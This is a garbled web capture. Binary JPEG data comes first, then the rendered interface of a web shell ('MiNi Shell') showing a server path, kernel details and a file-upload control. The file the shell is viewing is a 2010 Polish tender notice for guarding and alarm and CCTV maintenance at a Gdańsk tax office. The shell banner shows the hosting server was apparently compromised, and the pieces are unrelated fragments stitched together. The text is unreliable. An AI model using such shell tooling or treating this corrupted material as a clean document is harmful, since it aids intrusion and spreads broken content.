JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101124/334741-N-2010.html

<p class="kh_header"><b>Gdańsk: Postępowanie o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego na wykonanie usług w zakresie ochrony osób, obiektu 
i mienia (ochrona fizyczna) w obiekcie Pomorskiego Urzędu Skarbowego w Gdańsku przy ul. Żytniej 4/6 na okres 12 miesięcy, jak również monitoringu, konserwacji systemu sygnalizacji włamania i napadu, konserwacji systemu telewizji przemysłowej i konserwacji systemu sygnalizacji pożarowej</b><br>
<b>Numer ogłoszenia: 334741 - 2010; data zamieszczenia: 24.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pomorski Urząd Skarbowy w Gdańsku , ul. Żytnia 4/6, 80-749 Gdańsk, woj. pomorskie, tel. 0-58 69 05 937, faks 0-58 69 05 991.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.us.gdansk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego na wykonanie usług w zakresie ochrony osób, obiektu 
i mienia (ochrona fizyczna) w obiekcie Pomorskiego Urzędu Skarbowego w Gdańsku przy ul. Żytniej 4/6 na okres 12 miesięcy, jak również monitoringu, konserwacji systemu sygnalizacji włamania i napadu, konserwacji systemu telewizji przemysłowej i konserwacji systemu sygnalizacji pożarowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia.
Usługa ochrony:
Przedmiotem zamówienia publicznego są usługi ochrony osób, obiektu i mienia, konserwacji systemu sygnalizacji włamania i napadu (SSWiN), systemu telewizji przemysłowej (CCTV), systemu sygnalizacji pożarowej (SSP) w obiekcie Pomorskiego Urzędu Skarbowego w Gdańsku przy ul. Żytniej 4-6 oraz podłączenie i utrzymanie stałego połączenia SSWiN Pomorskiego Urzędu Skarbowego w Gdańsku z centrum monitorowania Wykonawcy oraz, w przypadku wystąpienia zagrożenia, interwencje grupy natychmiastowego reagowania.
Kody CPV:
74613000-9 - Usługi dozoru
74611000-5 - Usługi monitorowania alarmu
Słownik uzupełniający:
E063-2 - Konserwacja
Usługi ochrony mają spełniać następujące warunki:
-	ochrona fizyczna,
-	ochrona całodobowa, pełniona przez licencjonowanych pracowników ochrony zatrudnionych na umowę o pracę.
1.	Zamawiający informuje, że pracownicy świadczący usługi ochrony w obiekcie przy ul. Żytniej 4-6 muszą posiadać licencję pracownika ochrony fizycznej, minimum pierwszego stopnia oraz poświadczenia bezpieczeństwa osobowego upoważniające do dostępu do informacji niejawnych stanowiących tajemnicę służbową o klauzuli zastrzeżone lub wyższa.
2.	Wykonawca, którego ofertę Zamawiający uzna za najkorzystniejszą dostarczy Zamawiającemu kserokopie zaświadczeń z Krajowego Rejestru Karnego pracowników realizujących przedmiot zamówienia.
3.	Usługi ochrony mają być prowadzone zgodnie z wymaganiami zawartymi w Planie ochrony obiektu Pomorskiego Urzędu Skarbowego w Gdańsku oraz w Instrukcji pełnienia służby.
4.	Pracownicy wykonują usługi ochrony w systemie zmianowym 12 godzinnym po jednym pracowniku ochrony na zmianie.
5.	Ochrona fizyczna powinna być wykonana przez pracowników jednakowo umundurowanych, wyposażonych w identyfikatory, środki łączności bezprzewodowej oraz środki przymusu bezpośredniego.
6.	Do czynności wchodzących w skład ochrony osób, obiektu i mienia Pomorskiego Urzędu w Gdańsku należy w szczególności.
1)	strzeżenie przed kradzieżą, zniszczeniem lub uszkodzeniem mienia oraz dokumentów Zamawiającego;
2)	zapewnienie bezpieczeństwa zdrowia, życia i nietykalności osobistej pracowników i petentów Zamawiającego;
3)	utrzymanie spokoju i porządku wśród petentów Zamawiającego oraz kontroli ruchu, w tym ruchu osobowego w obrębie chronionego obiektu Zamawiającego;
4)	okresowe patrolowanie chronionego obiektu (w nieregularnych odstępach czasowych aczkolwiek nie rzadziej niż co 2 godziny) oraz obserwacja osób wchodzących na chroniony teren;
5)	ustalanie uprawnień osób do przebywania w ochranianym obiekcie oraz legitymowanie osób w celu ustalenia ich tożsamości;	
6)	wezwanie osób do opuszczenia ochranianego terenu w przypadku stwierdzenia braku uprawnień do przebywania na chronionym terenie albo stwierdzenia zakłócania porządku;
7)	ujęcie osób stwarzających zagrożenie dla życia, zdrowia lub nietykalności osobistej, a także dla chronionego mienia w celu niezwłocznego przekazania tych osób Policji;
8)	zapewnienie rodzaju i ilości uzbrojenia oraz ilości i rodzaju przymusu bezpośredniego zgodnie z planem ochrony w tym w szczególności paralizatora elektrycznego uprzednio uzgodnionego z Pełnomocnikiem ds. Ochrony Informacji Niejawnych Zamawiającego
9)	kontrola prawidłowości zamknięć i zabezpieczeń (zaplombowania) pomieszczeń, okien oraz wyłączenie oświetlenie oświetlenia i odbiorników prądu elektrycznego mogących stanowić źródło pożaru, jak również sprawdzenie zamknięć kranów w sanitariatach chronionego obiektu po godzinach pracy;
10)	obchód obiektu na zewnątrz podczas przejmowania służby przez zmiennika w celu sprawdzenia czy nie pozostawiano uchylonych okien i włączonego oświetlenia po godzinach pracy;
11)	wydawanie i przyjmowanie kluczy od pomieszczeń biurowych i innych chronionego obiektu;
12)	niezwłoczne powiadamianie Policji, Straży Pożarnej oraz wskazanych pracowników Zamawiającego w przypadku ujawnienia jakiejkolwiek sytuacji podejrzanej, zaistniałej na terenie chronionego obiektu;
13)	wykonanie zadań punktu ostrzegania i alarmowania pracowników Urzędu w sytuacji zagrożenia;
14)	koordynowanie działań ochrony w czasie zagrożenia oraz wspomaganie akcji ewakuacyjnej w przypadku zagrożenia;
15)	obsługa urządzeń systemu sygnalizacji włamania i napadu, systemu sygnalizacji pożarowej oraz systemu telewizji przemysłowej;
16)	sprawdzenie dróg ewakuacyjnych pod względem ich drożności;
17)	współdziałanie ze służbami porządkowymi (ratowniczymi);
18)	informowanie Pełnomocnikowi ds. Ochrony Informacji Niejawnych Zamawiającego o wszystkich nieprawidłowościach mających wpływ na obniżenie bezpieczeństwa obiektu;
19)	nadzorowanie otwierania i zamykania chronionego obiekty oraz terenu zgodnie z obowiązującym u Zamawiającego porządkiem;
20)	sprawdzenie korytarzy i pomieszczeń ogólnodostępnych pod kątem:
a)	nie pozostania w obiekcie osób nieuprawnionych,
b)	nie pozostawienia przedmiotów budzących podejrzenia wybuchu, pożaru itp.,
c)	występowania objawów awarii instalacji użytkowych funkcjonujących w obiekcie,
21)	prowadzenie zgodnie z obowiązującymi przepisami dokumentacji ochronnej;
22)	w okresie zimowym informowanie telefoniczne do godziny 5.00, wskazanego przez Zamawiającego pracownika o nagłych opadach śniegu;
23)	wykonanie innych czynności związanych z tokiem pełnienia służby, określonych w Planie Ochrony Obiektu Pomorskiego Urzędu Skarbowego w Gdańsku oraz w Instrukcji Pełnienia Służby.
	Wykonawca weźmie udział w Analizie oceny stanu zagrożenia i zabezpieczenia w obiekcie Pomorskiego Urzędu Skarbowego w Gdańsku raz na kwartał, w terminie podanym przez Zamawiającego oraz na każde wezwanie Pionu ochrony Zamawiającego.
	Usługi konserwacji systemu sygnalizacji włamania i napadu (SSWiN), systemu telewizji przemysłowej (CCTV) oraz systemu sygnalizacji pożarowej (SSP) polegające na stałej konserwacji tych systemów zainstalowanych w obiekcie Pomorskiego Urzędu Skarbowego w Gdańsku przy ul. Żytniej 4/6 składającego się z ok. 40 czujek, ok. 30 lamp ewakuacyjnych, 3 manipulatorów, 9 kamer zewnętrznych, 2 wewnętrznych. Wykonawca wykonywać będzie powyższe usługi raz na kwartał, w terminie uzgodnionym z Zamawiającym oraz na każde wezwanie Zamawiającego. Do czynności wchodzących w skład konserwacji SSWiN, CCTV oraz SSP należy w szczególności:
1.	sprawdzenie linii dozorowych, wyzwolenie alarmu, zresetowanie i ewentualne korekty;
2.	sprawdzenie czujek, wejście w proc. test, wymuszenie zadziałania, kontrola poprawności, ewentualne korekty i wyjście z testu w stan czuwania;
3.	sprawdzanie zasilania 230 V AC i 12 V DC oraz korekta prądu ładowania akumulatorów, czyszczenie zacisków akumulatora;
4.	sprawdzenie sygnalizatorów wew. i zew. wraz z zasilaniem awaryjnym;
5.	sprawdzenie centrali z odczytem programu i ewentualną jego korektą, odczytem pamięci zdarzeń, regulacja czasu rzeczywistego;
6.	zmiana kodów zabezpieczających;
7.	sprawdzenie i próby powiadamiania o alarmie urządzeniami automatycznymi;
8.	próbny rozruch i sprawdzenie całości (wraz z okablowaniem);
9.	utrzymanie w stanie czystości urządzeń SSWiN łącznie z elementami optycznymi czujników - konserwacje SSW będą wykonywane i prowadzone zgodnie z Załącznikiem nr 5 do niniejszej SIWZ;
10.	sprawdzenie i regulacja systemu CCTV wew. i zew. - utrzymanie w czystości kamer łącznie z elementami optycznymi;
11.	utrzymanie w stanie czystości urządzeń SSP łącznie z czujnikami ppoż. - wykonawca zobowiązany jest do sporządzenia protokółu z przeglądu i konserwacji SSP;
12.	konserwacje, przeglądy i naprawy ww. systemów będą wykonywane sprzętem Wykonawcy - Wykonawca zabezpieczy drabiny do konserwacji urządzeń;
13.	wykonanie przeglądów i konserwacji, o których mowa powyżej oraz jej zakres zostanie każdorazowo potwierdzony przez pracownika Pionu ochrony z ramienia Zamawiającego;
14.	przeglądy i konserwacje SSWiN oraz CCTV może przeprowadzać jedynie pracownik posiadający licencję pracownika zabezpieczenia technicznego pierwszego lub drugiego stopnia i posiadający aktualne poświadczenie bezpieczeństwa osobowego;
15.	dopuszcza się wykonanie usług przeglądu i konserwacji przez podwykonawcę w części dotyczącej systemu sygnalizacji pożaru (SSP);
16.	usługa dokonywania napraw w przypadku awarii lub stwierdzenia usterek w SSWiN, CCTV lub SSP obejmuje:
1)	przegląd systemu w celu stwierdzenia przyczyny uszkodzenia,
2)	zakupu oraz dostawę sprzętu i urządzeń w zakresie wymaganym dla dokonania naprawy, po zatwierdzeniu listy materiałów lub urządzeń przez przedstawiciela Zamawiającego - wymagane jest przedstawienie kosztorysu wykonania całości prac,
3)	dokonanie naprawy
4)	sprawdzenie po naprawie, czy system jest całkowicie w stanie gotowości do pracy.
17.	w przypadku wystąpienia uszkodzenia lub awarii w SSWiN, CCTV lub SSP Wykonawca obowiązany jest usunąć usterki w czasie 12 godzin od pozyskania informacji o uszkodzeniu lub awarii systemu;
18.	Wykonawca zobowiązany jest do przeszkolenia nowo przyjętych pracowników ochrony w zakresie obsługi systemów SSWiN, CCTV i SSP;
19.	Wykonawca przekaże i na bieżąco będzie aktualizował wykaz osób z telefonami i adresami do stałych kontaktów z Zamawiającym.	
Monitoring elektroniczny z grupami natychmiastowego reagowania polega na:
1.	Podłączeniu (na koszt Wykonawcy) centralek SSWiN Zamawiającego do stacji monitorowania Wykonawcy przy pomocy łącza sztywnego (na istniejących łączach telefonicznych) lub specjalnego nadajnika GSM lub nadajnika radiowego;
2.	Automatycznym przekazywaniu do stacji monitorowania Wykonawcy następujących zdarzeń rejestrowanych przez SSWiN Zamawiającego:
1)	alarmów włamaniowych i napadowych,
2)	prób sabotażu systemu alarmowego,
3)	transmisji testowych (co 12 godzin),
3.	Analizie otrzymanych sygnałów;
W przypadku stwierdzenia alarmu lub awarii, niezwłocznym wysłaniu grupy natychmiastowego reagowania do chronionego obiektu w celu wzmocnienia ochrony do czasu usunięcia przyczyny alarmu lub awarii. Czas dotarcia do obiektu Pomorskiego Urzędu Skarbowego w Gdańsku przy ul. Żytniej 4/6 nie może przekraczać 10 minut.
Zamawiający zastrzegą sobie prawo do powiadomienia grupy natychmiastowego reagowania w celu sprawdzenia warunków umowy raz na pół roku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.61.30.00-9, 74.61.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Koncesja MSWiA na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia, zgodną z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tj. Dz. U. z 2005 r. Nr 145 poz.1221) wraz ze wszystkimi decyzjami zmieniającymi, wydanymi do pierwotnego dokumentu. W przypadku, gdy Wykonawcy występują wspólnie stosowne dokumenty dostarczy każdy z Wykonawców, dokumenty potwierdza 
za zgodność z oryginałem Pełnomocnik zgodnie z art. 23 Ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych w okresie ostatnich trzech lat usług ochrony osób, obiektów i mienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich przedmiotu, powierzchni biurowej w m2 w obiektach administracji rządowej i samorządowej, w bankach, obiektach sektora prywatnego o charakterze administracyjno - biurowym, z wskazaniem dat wykonania zamówienia (data rozpoczęcia i zakończenia zamówienia) i odbiorców oraz załączenia dokumentów (np. referencji) potwierdzających, że usługi te zostały wykonane należycie sporządzony na druku stanowiącym ZAŁĄCZNIK NR 3 do niniejszej specyfikacji. Usługi wymienione w wykazie winny być świadczone przez okres nie krótszy niż 6 miesięcy.
Zamawiający uzna warunek za spełniony jeżeli co najmniej dwie wykazane usługi ochrony osób, obiektów i mienia spełnią następujące warunki:
1.	będą świadczone w obiektach administracji rządowej i samorządowej, w bankach oraz w przypadku
usług realizowanych w obiektach sektora prywatnego o charakterze administracyjno - biurowym, chronione obiekty będą posiadały powierzchnię biurową większa niż 1500 m2 każdy,
2.	zostaną załączone dokumenty (referencje) potwierdzające, że usługi te zostały wykonane należycie Oferta Wykonawcy, w której nie zostaną wykazane minimum dwie usługi spełniające powyższe warunki, zostanie przez Zamawiającego odrzucona.
W przypadku Wykonawców występujących wspólnie Zamawiający uzna warunek za spełniony jeżeli Wykonawcy wykażą się łącznie dwiema usługami ochrony osób, obiektów i mienia w obiektach administracji rządowej i samorządowej, w bankach oraz obiektach sektora prywatnego o charakterze administracyjno - biurowym w których powierzchnia biurowa będzie większa niż 1500 m2 każdy i dokumentami potwierdzającymi ich wykonanie (np. referencjami) spełniającymi powyższe warunki, (w przypadku, gdy Wykonawcy występują wspólnie druk podpisze Pełnomocnik) - dokumenty te winny być potwierdzeniem usług wymienionych w ZAŁĄCZNIKU NR 3.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie jest wymagane</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>kserokopię licencji (legitymacji ze zdjęciem) Pracownika Zabezpieczenia Technicznego minimum I Stopnia wydanej na podstawie Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 4 czerwca 1998 roku w sprawie wzoru i trybu wydawania licencji pracownika ochrony fizycznej i licencji pracownika zabezpieczenia technicznego oraz trybu i częstotliwości wydawania przez organy Policji opinii o pracownikach ochrony (Dz. U. nr 78, poz. 511). W przypadku Wykonawców występujących wspólnie Zamawiający uzna za spełniony wyżej wymieniony warunek, jeżeli Wykonawcy wykażą łącznie wymagany dokument. Dokumenty potwierdza za zgodność z oryginałem, Pełnomocnik zgodnie z art. 23 Ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ust. 2 Ustawy. Pełnomocnictwo musi wskazywać Pełnomocnika, musi wymieniać wszystkich Wykonawców wspólnie ubiegających się o zamówienie oraz każdy z tych Wykonawców musi potwierdzić podpisem ustanowienie pełnomocnictwa zgodnie z pkt. XIV SIWZ. Ponadto Pełnomocnictwo w szczególności powinno wskazywać czy dotyczy: reprezentowania wszystkich Wykonawców w postępowaniu i zawarcia umowy o zamówienie publiczne w ich imieniu, tylko reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia. Zgodnie z art. 141 Ustawy Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. W przypadku spółek cywilnych należy dołączyć umowę spółki cywilnej, w której będą dane o sposobie reprezentacji spółki na zewnątrz.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>należy przedłożyć oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy chyba, że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy, lub zmiany te są korzystne dla Zamawiającego.
2. Zamawiający zastrzega sobie możliwość zmniejszenia ilości godzin pełnienia służby ochrony fizycznej w ciągu doby oraz rezygnacji z ochrony fizycznej w dni wolne od pracy Zamawiającego. Zmiany te wchodzą w życie po upływie 30 dni od momentu pisemnego powiadomienia Wykonawcy.
3.  Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy. 
4. Zmiana niniejszej Umowy dokonana z naruszeniem przepisu ust.1 jest nie ważna.
5. Zmiana niniejszej Umowy wymaga formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.us.gdansk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Pomorskiego Urzędu Skarbowego w Gdańsku przy ul. Żytniej 4/6.</p>
